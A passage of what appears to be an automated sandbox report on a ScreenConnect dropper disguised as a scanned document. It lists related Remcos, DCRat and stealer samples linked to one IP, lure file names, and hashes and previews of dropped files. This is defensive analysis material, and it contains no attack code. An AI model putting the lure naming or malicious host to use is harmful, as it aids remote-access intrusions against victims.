                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                404.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                jD1RqkyUNm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                ejdc7iP3A7.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    Scan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                        Scan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                          invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                            Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                              He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                  VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                    vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                      s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.8307250465091273
Encrypted: false
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xfcf058cc, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.6585729606571151
Encrypted: false
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.08101654594557003
Encrypted: false
Malicious: false
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9250034890826702
Encrypted: false
                                                                                                                                                                                                                                                                        SSDEEP:192:9FMtZ5yYdZP0BU/o6Gji0ozuiFGZ24IO8aO:8YqZ8BU/Qj8zuiFGY4IO87
                                                                                                                                                                                                                                                                        MD5:64F055F80CEBFA4E94E6FAE2E7C39D89
                                                                                                                                                                                                                                                                        SHA1:3B373B28C8B096D32F9A48793487F7F9DFD3C6F2
                                                                                                                                                                                                                                                                        SHA-256:4CFA90A35FF62A147F3AAF75441687574C174945295AA8334442197AD63DCA59
                                                                                                                                                                                                                                                                        SHA-512:7CE8D7129C2413DE2317705A01B690D7BD04DF203AFB4F41C83D01A0A0FA7B4154D38C4050E9BFB03E9157467A0E971220CC842624D405BEBDC7004E1A199A70
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.1.6.5.7.0.5.3.7.5.2.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.1.6.5.7.2.1.1.5.6.6.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.d.9.9.8.5.1.-.e.a.4.1.-.4.a.a.5.-.8.4.2.2.-.6.c.4.9.2.5.e.0.8.4.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.d.6.9.d.d.c.-.2.f.7.3.-.4.6.7.c.-.8.1.a.3.-.b.4.0.9.c.a.b.9.4.3.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.c.a.n._.d.o.c._.0.9._.1.6._.2.4._.1.1.2.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.4.-.0.0.0.1.-.0.0.1.4.-.f.2.5.9.-.6.4.b.d.8.2.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.e.8.8.e.7.e.c.d.b.7.4.c.5.d.9.e.b.8.0.7.8.c.8.2.d.4.f.f.0.d.0.0.0.0.f.f.f.f.!.0.0.0.0.7.1.6.6.0.3.7.4.a.d.f.6.8.0.a.e.6.6.1.c.6.7.5.d.1.7.2.3.b.d.5.a.b.0.6.c.7.7.a.8.!.S.c.a.n._.d.o.c._.0.9._.1.
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Wed Oct 2 04:22:50 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):78668
                                                                                                                                                                                                                                                                        Entropy (8bit):1.7273508636791532
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:bUbVqK8mQtbX7GOhI/8rZ/dkgir0tFfhdIo7PemHOufAinrHfsnPr7Inr:GVqK8mQnhI/Rn0DfP9PllYiTirM
                                                                                                                                                                                                                                                                        MD5:B4374F2E682B9A26677DAEC44228D390
                                                                                                                                                                                                                                                                        SHA1:D0A6B63E0B220A475E1639A3A28E1DD676CB8B2F
                                                                                                                                                                                                                                                                        SHA-256:D9EB3D8A0250F17A6885E084136E9B8173DAA314D25581035DC7415DEBFDB40E
                                                                                                                                                                                                                                                                        SHA-512:47744AAAD9CB73CEDF6FB5DFDF4A76FA0B373B6CFF65EBE9769AE755B62E04D37CAC6E1CEEC128F1BB9288EE6C4B9F105B8576BB00D5A9791C1480FE9538D062
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8378
                                                                                                                                                                                                                                                                        Entropy (8bit):3.6980279426968585
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJe1646YEIBSUG5y+gmf5thprf89bNPsfELvm:R6lXJ8646YEuSUT+gmf5tsN0fH
                                                                                                                                                                                                                                                                        MD5:ABE24BB211DBC675BA5FC8226C561120
                                                                                                                                                                                                                                                                        SHA1:0C2D816674332B3652100780ADCEBC95F75D3644
                                                                                                                                                                                                                                                                        SHA-256:A3C2A06F0D0C53733F2F3837873B873459AD6EB7F8C3059A7F749250E51D9AE0
                                                                                                                                                                                                                                                                        SHA-512:E6ACF3F8AE6BD47F268ED5C0734611ECAD54FFFD3BB1B98FBA17B15641670892541EEB543F8CAF49C8ED1FF14063E2D249CD8A26D2CB53F474A9DDE4CDBB6CF6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.2.<./.P.i.
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4653
                                                                                                                                                                                                                                                                        Entropy (8bit):4.497592489262267
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsAJg77aI9huWpW8VYuYm8M4Jq/bfbwLFyw+q8/bSTYjQeQ0d:uIjfGI7HP7VCJ2bfbfwmbfjQeQ0d
                                                                                                                                                                                                                                                                        MD5:65BAB0A2546394E68724448198A7F06C
                                                                                                                                                                                                                                                                        SHA1:34BDBE91946C950F069F9ED54B129BB6F98C14EC
                                                                                                                                                                                                                                                                        SHA-256:98547A21FE72A41458E989C480016C5181F4C2351DFD77322E8826FF694C7919
                                                                                                                                                                                                                                                                        SHA-512:E486D5B9D3621B6CD2C9FFE001D03A9FFA31B4F9996716F47C5CF4F03DFC2B1ABAE1458D3FB9655B8D4157EADF8A58E52A2CAB385DA2AA9E89B280CA598134A0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525325" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):86990
                                                                                                                                                                                                                                                                        Entropy (8bit):3.089546500052646
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:wcWug0xYMz0frFz45perZ4D9Kf1dJo2Uqd:wcWug0xYMz0frFz45perZ4D9Kf1dJo2j
                                                                                                                                                                                                                                                                        MD5:0F8E5D3C2EFC40BD98CE2E1ED9CEF927
                                                                                                                                                                                                                                                                        SHA1:2C51C308A833A77DDE36AEB9DA2E06F305FE5C0F
                                                                                                                                                                                                                                                                        SHA-256:1074F7D800A8452BEA011041852577D47FF6210B6F33B77F96FB431188162056
                                                                                                                                                                                                                                                                        SHA-512:34FEA4B1B6636CFC4C12CFA35BD778D7C4C87DB63B5C282F7145B44451C75893453426458B6094814B43BD3EE5E0A8C669DC4D6518C0DFBBDAED553002637363
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                                                        Entropy (8bit):2.684181407381494
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:TiZYW9tQjpYRQDYGWLHfYEZHYt8iOLyCXywpmftaVFBgMDexIhS3:2ZDC1EB/SaVFBgMDeuhS3
                                                                                                                                                                                                                                                                        MD5:B5A720F97BB6C1E0143DD9CC62B44959
                                                                                                                                                                                                                                                                        SHA1:ED9E21D4461874384611E4742FCCD46200D480AF
                                                                                                                                                                                                                                                                        SHA-256:12BA3B8A08A4F8D6BD00B3504BA0022217269EA9AEB4D6EB5ACCBF1099940E0E
                                                                                                                                                                                                                                                                        SHA-512:07BD87D43B97F8B7FF22DF21229EDB1D7BD9A601016DE5D919CC38C0B0646278764A4C551F8EB7B21C1063A280AAB8780275DDED733BB95D57033264F786A7E1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                                                        Entropy (8bit):7.552295515462603
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
                                                                                                                                                                                                                                                                        MD5:D3E1E6C22706565D07C5B9CF083E39F6
                                                                                                                                                                                                                                                                        SHA1:12D3BC9406E47A98818A8E21DEEED08DAF79B029
                                                                                                                                                                                                                                                                        SHA-256:AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
                                                                                                                                                                                                                                                                        SHA-512:BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                                                        Entropy (8bit):3.457276079732274
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKmr8SsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:2pHkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                        MD5:0D7A7CF198513A32883B594E89C5ECA3
                                                                                                                                                                                                                                                                        SHA1:F20B1770A1EEE98FA842F5B446EC872AC5751B7C
                                                                                                                                                                                                                                                                        SHA-256:9253683F1C5A2EC4AF8DCC64280121F6FA9FE22719051AE6047201AA5BD60C7C
                                                                                                                                                                                                                                                                        SHA-512:EA446E67DF472CBFE94629D6AE828AFA3EC945CE7965205E0747745337EC078E8F1A72DD2B7A24C9A16396B36839CE0348E134EDB0B151F9E25F4AFA0E0CC82D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ...............(...............................................=.w..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKPb99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HbkDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                                        MD5:E400C1311766AA8AF0BC6968C3C56F50
                                                                                                                                                                                                                                                                        SHA1:D5EBC7B3855FAF6404567DC061C8FC158515259E
                                                                                                                                                                                                                                                                        SHA-256:B722903BFE906EBBE7DCFC680B356C95C95020BFDCD6AA7AAB7649512E9F5449
                                                                                                                                                                                                                                                                        SHA-512:ABE37139915D1C09D7C25947D370816DB18B14AA8674D264F65569933E14C422B911FD47ECAB4BC4F9D86BA048E73F22477560221931BF426BE09E1C017DAF07
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... .........%.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2220888806886414
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKU/FzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:jtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                        MD5:C6C9F5EFD7B40517B37DC3ED7D40F971
                                                                                                                                                                                                                                                                        SHA1:A1BBF858F0217353542419C1637E35ED64D91A7C
                                                                                                                                                                                                                                                                        SHA-256:3AF4E69BA166D44E61BE23C5C377759C83133333F7614F3A68E0930EBF483943
